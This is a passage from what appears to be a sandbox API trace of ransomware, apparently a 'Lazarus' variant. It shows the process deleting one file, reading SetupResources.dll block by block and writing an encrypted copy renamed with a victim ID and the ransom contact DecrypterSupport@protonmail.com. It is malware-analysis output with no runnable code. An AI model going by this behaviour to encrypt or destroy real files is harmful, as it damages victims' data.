dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0072.649] GetFileType (hFile=0x418) returned 0x1 [0072.649] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0072.649] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8d438 [0072.649] GetLastError () returned 0xb7 [0072.649] SetLastError (dwErrCode=0xb7) [0072.649] WriteFile (in: hFile=0x418, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0072.650] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d438 | out: hHeap=0x20000) returned 1 [0072.650] CloseHandle (hObject=0x418) returned 1 [0072.651] AreFileApisANSI () returned 1 [0072.651] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0072.651] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x715b8 [0072.651] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x715b8, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\3076\\LocalizedData.xml") returned 45 [0072.651] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\3076\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\3076\\localizeddata.xml")) returned 1 [0072.652] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0072.652] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0072.652] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0072.652] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0072.652] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0072.652] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0072.652] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0072.652] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a660 | out: hHeap=0x20000) returned 1 [0072.652] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d618 | out: hHeap=0x20000) returned 1 [0072.652] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d4f8 | out: hHeap=0x20000) returned 1 [0072.652] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85fc0 | out: hHeap=0x20000) returned 1 [0072.652] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b450 | out: hHeap=0x20000) returned 1 [0072.652] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0072.652] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0072.652] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0072.652] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0072.652] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0072.652] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0072.652] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.652] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.652] FindNextFileW (in: hFindFile=0x78350, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758, dwReserved0=0x1, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0072.652] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0072.652] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0072.652] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0072.652] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0072.652] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0072.653] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0072.653] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0072.653] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0072.653] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0072.653] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0072.653] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0072.653] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0072.653] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0072.653] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0072.653] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0072.653] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0072.653] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0072.653] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0072.653] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0072.653] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0072.653] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0072.653] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0072.653] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0072.653] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0072.653] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0072.653] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0072.653] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.653] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.653] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.653] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.653] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0072.653] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0072.653] AreFileApisANSI () returned 1 [0072.653] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\3076\\SetupResources.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\3076\\SetupResources.dll", lpUsedDefaultChar=0x0) returned 46 [0072.653] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0072.653] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.653] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.653] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0072.653] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0072.654] AreFileApisANSI () returned 1 [0072.654] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0072.654] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71960 [0072.654] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\3076\\SetupResources.dll") returned 46 [0072.654] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3076\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\3076\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0072.654] GetFileType (hFile=0x418) returned 0x1 [0072.654] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0072.654] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0072.654] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0072.654] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0072.655] CloseHandle (hObject=0x418) returned 1 [0072.655] AreFileApisANSI () returned 1 [0072.655] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0072.655] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71960 [0072.655] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\3076\\SetupResources.dll") returned 46 [0072.655] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3076\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\3076\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0072.655] GetFileType (hFile=0x418) returned 0x1 [0072.655] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0072.655] CloseHandle (hObject=0x418) returned 1 [0072.655] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0072.655] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0072.655] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0072.655] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0072.655] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0072.655] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0072.655] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0072.655] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0072.655] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0072.655] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0072.655] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0072.655] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0072.656] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0072.656] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0072.656] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0072.656] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0072.656] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0072.656] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0072.656] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0072.656] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0072.656] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0072.656] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0072.656] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0072.656] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0072.656] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0072.656] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0072.656] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0072.656] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0072.656] AreFileApisANSI () returned 1 [0072.656] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0072.656] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71bd0 [0072.656] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x71bd0, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\3076\\SetupResources.dll") returned 46 [0072.656] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\3076\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\3076\\setupresources.dll"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758)) returned 1 [0072.656] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0072.656] AreFileApisANSI () returned 1 [0072.656] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0072.656] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0072.656] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0072.656] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0072.656] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0072.656] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0072.656] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0072.656] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0072.656] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0072.656] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0072.657] GetLastError () returned 0x0 [0072.657] SetLastError (dwErrCode=0x0) [0072.657] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e260 [0072.657] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x85fc0 [0072.657] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b8b0 [0072.657] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d768 [0072.657] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d588 [0072.657] GetLastError () returned 0x0 [0072.657] SetLastError (dwErrCode=0x0) [0072.657] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0072.657] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0072.657] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5f) returned 0x71960 [0072.657] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0072.657] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8af48 [0072.657] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0072.657] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0072.657] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0072.657] AreFileApisANSI () returned 1 [0072.657] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8af48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 108 [0072.657] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd8) returned 0x80a30 [0072.657] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8af48, cbMultiByte=-1, lpWideCharStr=0x80a30, cchWideChar=108 | out: lpWideCharStr="C:\\588bce7c90097ed212\\3076\\SetupResources.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 108 [0072.657] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3076\\SetupResources.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\3076\\setupresources.dll.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0072.658] GetFileType (hFile=0x418) returned 0x1 [0072.658] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80a30 | out: hHeap=0x20000) returned 1 [0072.658] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0072.658] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0072.658] AreFileApisANSI () returned 1 [0072.658] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0072.658] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x715b8 [0072.658] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x715b8, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\3076\\SetupResources.dll") returned 46 [0072.658] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3076\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\3076\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0072.658] GetFileType (hFile=0x410) returned 0x1 [0072.658] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0072.658] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a3b0 [0072.658] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0072.658] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0072.658] GetLastError () returned 0x0 [0072.658] SetLastError (dwErrCode=0x0) [0072.659] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0072.659] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0072.659] GetLastError () returned 0x0 [0072.659] SetLastError (dwErrCode=0x0) [0072.659] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0072.659] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0072.659] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8d438 [0072.659] ReadFile (in: hFile=0x410, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0072.661] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0072.661] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6f0 [0072.661] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8e440 [0072.661] GetLastError () returned 0x0 [0072.661] SetLastError (dwErrCode=0x0) [0072.661] GetLastError () returned 0x0 [0072.661] SetLastError (dwErrCode=0x0) [0072.661] GetLastError () returned 0x0 [0072.662] SetLastError (dwErrCode=0x0) [0072.662] GetLastError () returned 0x0 [0072.662] SetLastError (dwErrCode=0x0) [0072.662] ReadFile (in: hFile=0x410, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0072.662] WriteFile (in: hFile=0x418, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0072.663] GetLastError () returned 0x0 [0072.663] SetLastError (dwErrCode=0x0) [0072.663] GetLastError () returned 0x0 [0072.663] SetLastError (dwErrCode=0x0) [0072.663] GetLastError () returned 0x0 [0072.663] SetLastError (dwErrCode=0x0) [0072.663] GetLastError () returned 0x0 [0072.663] SetLastError (dwErrCode=0x0) [0072.663] ReadFile (in: hFile=0x410, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0072.664] WriteFile (in: hFile=0x418, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0072.664] GetLastError () returned 0x0 [0072.664] SetLastError (dwErrCode=0x0) [0072.664] GetLastError () returned 0x0 [0072.664] SetLastError (dwErrCode=0x0) [0072.664] GetLastError () returned 0x0 [0072.664] SetLastError (dwErrCode=0x0) [0072.664] GetLastError () returned 0x0 [0072.664] SetLastError (dwErrCode=0x0) [0072.665] ReadFile (in: hFile=0x410, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x758, lpOverlapped=0x0) returned 1 [0072.665] WriteFile (in: hFile=0x418, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0072.665] GetLastError () returned 0x0 [0072.665] SetLastError (dwErrCode=0x0) [0072.665] ReadFile (in: hFile=0x410, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0072.665] GetLastError () returned 0x0 [0072.665] SetLastError (dwErrCode=0x0) [0072.665] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0072.665] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d798 [0072.665] GetLastError () returned 0x0 [0072.665] SetLastError (dwErrCode=0x0) [0072.665] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6f0 | out: hHeap=0x20000) returned 1 [0072.665] WriteFile (in: hFile=0x418, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x760, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327ef70*=0x760, lpOverlapped=0x0) returned 1 [0072.666] GetLastError () returned 0x0 [0072.666] SetLastError (dwErrCode=0x0) [0072.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0072.666] GetLastError () returned 0x0 [0072.666] SetLastError (dwErrCode=0x0) [0072.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0072.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: 